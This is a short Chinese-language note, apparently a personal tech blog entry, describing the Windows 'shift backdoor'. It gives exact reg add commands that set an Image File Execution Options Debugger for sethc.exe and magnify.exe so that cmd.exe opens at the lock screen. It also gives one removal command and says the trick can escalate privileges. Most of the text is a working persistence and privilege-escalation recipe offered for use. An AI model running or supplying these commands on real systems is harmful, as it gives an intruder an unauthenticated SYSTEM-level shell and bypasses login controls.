需要有修改注册表权限
如果有修改注册表权限,还可以用来提权
网上文章很多,这里记录一个
shift后门
连续键入5次Shift键会会执行cmd.exe弹出命令行窗口
操作方法:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options下,新建一个项,项名为sethc.exe;Debugger,值的内容为cmd.exe的执行路径C:\\windows\\system32\\cmd.exe。命令行操作命令:
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe" /v Debugger /t REG_SZ /d "c:\\windows\\system32\\cmd.exe" /f
恢复命令:
reg delete "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe" /f
REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe" /v Debugger /t REG_SZ /d "C:\\windows\\system32\\cmd.exe"
然后锁定用户,点击放大镜